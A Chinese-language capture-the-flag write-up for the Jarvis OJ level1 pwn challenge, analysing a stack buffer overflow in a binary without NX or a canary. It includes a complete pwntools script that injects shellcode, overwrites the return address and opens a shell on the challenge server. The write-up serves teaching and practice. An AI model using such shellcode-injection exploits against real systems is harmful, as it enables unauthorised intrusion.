Jarvis OJ - [XMAN]level1 - Writeup
M4x原創,轉載請表明出處http://www.cnblogs.com/WangAoBo/p/7594173.html
題目:
分析
-
checksec檢查保護機制如下,NX沒開,可以通過執行shellcode來get shell
-
拖到IDA中,查看函數的流程,vulnerable_function函數打印了緩沖區的起始地址,read可以讀取0x100個字符,而buf到ret的偏移為0x88 + 0x4 < 0x100,而該elf又是No canary found。
-
整理一下現有的信息:
- 長度為0x100的緩沖區
- 緩沖區的起始地址
- 沒有打開棧保護和NX保護
因此,可以把shellcode填到以buf為起始地址的緩沖區里,並控制vulnerable_function返回到shellcode,就可以通過執行shellcode拿到shell,如下圖
-
步驟
-
經過如上分析,寫出exp如下:
1 #!/usr/bin/env python 2 # -*- coding: utf-8 -*- 3 __Auther__ = 'M4x' 4 5 from pwn import * 6 context(log_level = 'debug', arch = 'i386', os = 'linux') 7 8 shellcode = asm(shellcraft.sh()) 9 # io = process('./level1') 10 io = remote('pwn2.jarvisoj.com', 9877) 11 text = io.recvline()[14: -2] 12 # print text[14:-2] 13 buf_addr = int(text, 16) 14 15 payload = shellcode + '\x90' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr) 16 io.send(payload) 17 io.interactive() 18 io.close()
運行exp,拿到flag
